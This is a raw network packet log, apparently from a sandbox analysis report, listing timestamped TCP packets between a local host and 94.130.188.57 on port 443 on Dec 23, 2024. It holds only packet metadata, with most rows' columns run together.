                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:46.533381939 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:46.533503056 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:46.533849001 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:46.533865929 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.536930084 CET49771443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.537029982 CET4434977194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.537478924 CET49771443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.537478924 CET49771443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.537558079 CET4434977194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.936737061 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.936836958 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.937311888 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.937323093 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.939611912 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.939615965 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.939701080 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.939717054 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.939723015 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.939727068 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.939821959 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.939845085 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.939975977 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.940289974 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.940417051 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.940429926 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.940442085 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.940448046 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.940459967 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.940493107 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.940504074 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.060738087 CET4973680192.168.2.4192.229.221.95
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.060821056 CET4973180192.168.2.418.66.161.122
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.060868979 CET4973380192.168.2.413.227.8.41
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.181993008 CET8049736192.229.221.95192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.182051897 CET4973680192.168.2.4192.229.221.95
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.182074070 CET804973118.66.161.122192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.182089090 CET804973313.227.8.41192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.182123899 CET4973180192.168.2.418.66.161.122
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.182157993 CET4973380192.168.2.413.227.8.41
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.940695047 CET4434977194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.940799952 CET49771443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.941268921 CET49771443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.941302061 CET4434977194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.942905903 CET49771443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.942923069 CET4434977194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:49.705657959 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:49.705811977 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125149965 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125212908 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125226021 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125267029 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125313044 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125341892 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125374079 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125499010 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125520945 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125536919 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125559092 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.146050930 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.148794889 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.149151087 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.149175882 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.150513887 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.150526047 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.150578022 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.150599003 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.154381990 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.154412985 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.154860020 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.154896975 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160537958 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160566092 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160634041 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160649061 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160751104 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160773039 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160803080 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160818100 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160850048 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160866022 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160918951 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160936117 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161019087 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161045074 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161083937 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161118031 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161154985 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161173105 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161206961 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161221981 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161299944 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161334991 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161360025 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161371946 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.943996906 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.944068909 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.944087982 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.944137096 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.944188118 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.944242954 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.944911957 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.944922924 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:58.767847061 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:58.767910004 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:58.767991066 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:58.768249989 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:58.768273115 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:59.304259062 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:59.304332972 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:59.304358959 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:59.304394007 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:59.304405928 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:59.304441929 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:59.309998035 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:59.310024023 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.004916906 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.005027056 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.005146980 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.005337000 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.005361080 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.168356895 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.168546915 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.168806076 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.168821096 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.170376062 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.170389891 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.170470953 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.170497894 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.170600891 CET49778443192.168.2.494.130.188.57
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Dec 23, 2024 06:22:00.170641899 CET  443          49778      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:00.170835972 CET  49778        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:00.170948029 CET  443          49778      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:00.171098948 CET  49778        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:00.171133995 CET  443          49778      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:00.171166897 CET  49778        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:00.171183109 CET  443          49778      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:00.171209097 CET  49778        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:00.171220064 CET  443          49778      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.404098034 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.404195070 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.404741049 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.404772043 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.407094955 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.407108068 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.407222033 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.407254934 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.420027971 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.420069933 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.420212030 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.420238018 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.420367002 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.420394897 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.420422077 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.420437098 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.420486927 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.420511961 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.420578957 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.420593977 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.420610905 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.420634031 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.420670986 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.420686007 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.420694113 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.420715094 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.420737982 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.420759916 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.420797110 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.420810938 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.420844078 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.420874119 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.420898914 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.420912981 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.420957088 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.420991898 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.421022892 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.421045065 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.421067953 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.421081066 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.421097994 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.421109915 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.421156883 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.421174049 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.421192884 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.421211004 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.421246052 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.421261072 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.421307087 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.421322107 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.421359062 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.421376944 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.421407938 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.421427011 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.421477079 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.421494961 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.421576023 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.421595097 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.421626091 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.421638966 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.421658039 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.421669960 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.421701908 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.421716928 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.421757936 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.421772957 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.421873093 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.421889067 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.421921015 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.421936035 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.421967030 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.421993017 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.422030926 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.422030926 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.422075033 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.422115088 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.422138929 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.422187090 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.422213078 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.422257900 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.422295094 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.422354937 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.467349052 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.467757940 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.467801094 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.467823982 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.467863083 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.467895985 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.467911005 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.467935085 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.467963934 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.468014002 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.468046904 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.515327930 CET  443          49779      94.130.188.57  192.168.2.4
Dec 23, 2024 06:22:01.515547037 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.515733957 CET  49779        443        192.168.2.4    94.130.188.57
Dec 23, 2024 06:22:01.515774012 CET  49779        443        192.168.2.4    94.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.515805006 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.515832901 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.515861034 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.515885115 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.515908957 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.515930891 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.515959024 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.563363075 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.567039013 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.567055941 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.567089081 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.567123890 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.567229986 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.567271948 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.567301035 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.567342043 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.567399025 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.567425966 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.611356974 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.611555099 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.611628056 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.611675024 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.611700058 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.611747980 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.611761093 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.611779928 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.659341097 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.660635948 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.660784006 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.660973072 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.661041021 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.661098957 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.703355074 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.781348944 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.781517029 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.781558990 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.781938076 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.781980038 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.823381901 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.871200085 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.871445894 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.871460915 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.871573925 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.872431040 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.872477055 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.872987032 CET49785443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.873075008 CET4434978594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.873172998 CET49785443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.873471975 CET49785443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.873507977 CET4434978594.130.188.57192.168.2.4
